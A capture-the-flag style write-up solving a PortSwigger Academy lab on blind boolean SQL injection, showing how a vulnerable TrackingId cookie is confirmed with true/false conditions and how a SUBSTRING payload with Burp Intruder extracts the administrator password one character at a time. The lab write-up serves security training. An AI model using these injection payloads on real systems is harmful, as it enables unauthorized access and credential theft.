Solving Portswigger Academy: Blind SQL injection with conditional responses

In this lab we are going to solve the challenge where we need to find the administrator password using Blind Boolean SQL injection.

When you visit the lab, you will see the page which looks like below.

application home page

The back-end request and response looks like this

Request and Response

This time the category parameter is not vulnerable, rather the Cookie called as TrackingId is vulnerable.Send the above request to the repeater so that we can test it further. When we send the normal request we saw we get above request. To test it I added a single quote and see what response I get. In normal response the response size is 5498 but when we add a single quote the response size is lesser i.e. 5437.

Again I add a SQLi payload with condition i.e. ‘ AND ‘1’=’1 and I got the same response which I got previously with size 5498. The normal request has a string “Welcome back!”.

SQLi with valid condition

To test it further I use ‘1’=’2 which is false and response is without Welcome back! string in it.

This confirms SQLi is there. Now in lab we have provided the enough information, otherwise we need to first find the length of the current database, then it’s name, number of tables, length of table name, then table names, and so on.

As lab clearly mentioned we need to find the administrator password from users table. Here we can use substring() function. You can read about sub-string here.

So our query will become (SELECT SUBSTRING(password,1,1) FROM users WHERE username=’administrator’)=’character’

Final payload looks like ‘ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=’administrator’)=’character’

To test single and first character of the password, I used intruder and also in settings I searched for string ‘Welcome’ in response.In payload use a-z,A-Z and 0–9 characters.

Intruder results

As per above screen shot, the first letter of the password is ‘b’. Similarly we can use intruder to find other characters. To do so we can select couple of locations first one in substring where we select the starting index and another one is the character to brute force. In Attack type select Cluster bomb and we are brute forcing couple of positions.

For first payload select numbers from 0 to around 25 and second one should be same with different character sets.

Final intruder result.

The total length of password is 20 characters. The password is ‘b1erjkf1fcyluoe95z4z’. Let’s use this password to solve the lab.

This is how we are able to solve the lab.